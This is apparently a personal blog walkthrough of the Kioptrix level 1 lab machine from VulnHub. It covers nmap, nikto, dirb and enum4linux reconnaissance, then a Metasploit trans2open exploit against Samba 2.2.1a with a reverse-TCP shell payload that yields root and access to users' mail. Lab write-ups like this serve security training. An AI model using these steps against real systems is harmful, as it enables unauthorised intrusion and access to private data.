So today we will be doing the first machine of the Kioptrix series which can be found on vulnhub. The challange says “EMail” so I guess the flag is in the email of one of the user accounts.
So to start of we run the
netdiscover -r 192.168.0.0/24 command to find the machine on the local area network. But it doesn’t show anything, yet again. So I googled and came up with host discovery for nmap
nmap -sn 192.168.0.0/24. Seems to work good and fine so we will use this for any new machines, since netdiscover always takes a while and its a gamble if a machine shows up or not. The machine should be at the .131 address since we are .129 ourself.
So lets run a normal and a all port nmap scan with the following two commands:
nmap -sV -sC -vv 192.168.0.131 -oA nmap and
nmap -sV -sC -p- 192.168.0.131 -oA nmap full. We use verbose on the first nmap scan so we can start any new enumeration techniques while the nmap scan is still running.
We see port 80 is open, lets run a nikto and dirb scan on it while nmap is still running. We used the following two commands:
nikto -host http://192.168.0.131 -output nikto.txt and
dirb http://192.168.0.131 -o dirb.txt .
While these are running we can have a look at the nmap results, nmap should be done.
# Nmap 7.80 scan initiated Thu Feb 6 06:38:32 2020 as: nmap -sV -sC -vv -oA nmap 192.168.0.131 Nmap scan report for 192.168.0.131 Host is up, received syn-ack (0.0013s latency). Scanned at 2020-02-06 06:38:32 EST for 125s Not shown: 994 closed ports Reason: 994 conn-refused PORT STATE SERVICE REASON VERSION 22/tcp open ssh syn-ack OpenSSH 2.9p2 (protocol 1.99) --snip-- 80/tcp open http syn-ack Apache httpd 1.3.20 ((Unix) (Red-Hat/Linux) mod_ssl/2.8.4 OpenSSL/0.9.6b) | http-methods: | Supported Methods: GET HEAD OPTIONS TRACE |_ Potentially risky methods: TRACE |_http-server-header: Apache/1.3.20 (Unix) (Red-Hat/Linux) mod_ssl/2.8.4 OpenSSL/0.9.6b |_http-title: Test Page for the Apache Web Server on Red Hat Linux 111/tcp open rpcbind syn-ack 2 (RPC #100000) 139/tcp open netbios-ssn syn-ack Samba smbd (workgroup: TAMYGROUP) 443/tcp open ssl/https syn-ack Apache/1.3.20 (Unix) (Red-Hat/Linux) mod_ssl/2.8.4 OpenSSL/0.9.6b --snip-- 1024/tcp open status syn-ack 1 (RPC #100024) Host script results: |_clock-skew: 1h01m48s | nbstat: NetBIOS name: KIOPTRIX, NetBIOS user: <unknown>, NetBIOS MAC: <unknown> (unknown) | Names: | KIOPTRIX<00> Flags: <unique><active> | KIOPTRIX<03> Flags: <unique><active> | KIOPTRIX<20> Flags: <unique><active> | \x01\x02__MSBROWSE__\x02<01> Flags: <group><active> | MYGROUP<00> Flags: <group><active> | MYGROUP<1d> Flags: <unique><active> | MYGROUP<1e> Flags: <group><active> --snip--
Our full port scan didn’t found any extra services. We got a couple ports we can look at. 80, 111, 139, 443 and 1024. Seems like we have to either exploit port 139 netbios or the webserver on 80 or 443. Lets have a look at port 111 since I’m still curious where this port is normally used for. Doesn’t seem like we can do anything with it again. Should really look into the service later on.
The nikto and dirb scan are done, lets have a look at the results:
Seems like it gave us quite some false positives. Like the files //etc/hosts and the wordpress files and possible backdoor are not found on the servers. The /manual/ and /usage/ does exist. The usage page seems interesting to exploit:
While looking around the /test.php file is also listed. But it isn’t interesting it only shows the following, probable php4 is used but it doesn’t print the text. So it might aswell not be php4 since it isn’t printing the contents.
<?php4 print "TEST"; ?>
At the bottom of the webpage we can find the following: Generated by Webalizer Version 2.01. Is there any exploits for this versions? Lets use searchsploit with the following command
searchsploit webalizer. Doesnt seem like there is any.
While using the web I found https://www.cvedetails.com/cve/CVE-2002-0180/ seems like there is a vulnerability with code execution. But no exploit code available in searchsploit so it might be a tough one to exploit.
On to the next port, 139. I’m trying to enumerate the SMB service on port 139 but I’m having some problems. Enum4linux gave me a couple usernames but stopped running after a small bit. Lets save the user names to a txt file and then we can have a look at metasploit, which I normally don’t use but need to learn anyway.
Lets keep it simple, we can format the usernames later if we need it. Lets echo it to a txt file with the following command:
echo "administrator, guest, krbtgt, domain admins, root, bin, none" > kioptrix/usernames.txt
Lets start up metasploit with
msfconsole and use the
search smb command to see what we can do. At the bottom we see a bunch of exploits but not much I want to do with that yet.If we scroll up we can see a bunch of scanners:
Lets use a couple of these to see what we can find. Below are some results. You can just copy the path and then use the
use command with the path after it. Like
use auxiliary/scanner/smb/smb_version. Then we can do
show options to see the settings we have to set. We have to set the RHOST value which can be done with the
set RHOST 192.168.0.131. Then we can use the
run command to run it.
Seems like it is running Samba 2.2.1a. Is there any exploits for it. Lets run searchsploit again and we found some interesting exploits. Since we are using metasploit already lets try to find the one listed in there.
So the first exploit trans2open is for OSX, The system is running redheat from what the apache mainpage said. So that is not it. The second exploit nttrans says in metasploit that is it a DOS (Denial of Service) which is not what we want.
The third exploit trans2open seems interesting, which is available for multiple versions.
Let use the number 1 for Linux, check the options like we did before and set the RHOST and then run.
Seems like the meterpreter session works but it dies instantly:
Maybe we have to use another payload? Lets see what the exploit is using at the moment. We can see all the advanced options with
show advanced options. It is running a meterpreter reverse tcp payload.
show payloads command we can see all the available payloads. Lets use a normal reverse_tcp payload.
The use payload command in the screenshot above is wrong, we had to use
set payload linux/x86/shell/reverse_tcp. Lets check the options again, all good? I changed the Lport to 8080 and lets run it.
Looks like we got root access! But now we have to find the flag in an email or something? Lets look around for a bit if we can not find anything, lets google 😉
So I checked in the home directories, in the root directory and could not find it, so I googled and emails are under
/var/spool/mail. I catted the emails from the three users harold, john and root. And in root I found:
We completed the challange, on to level 2 in the Kioptrix series.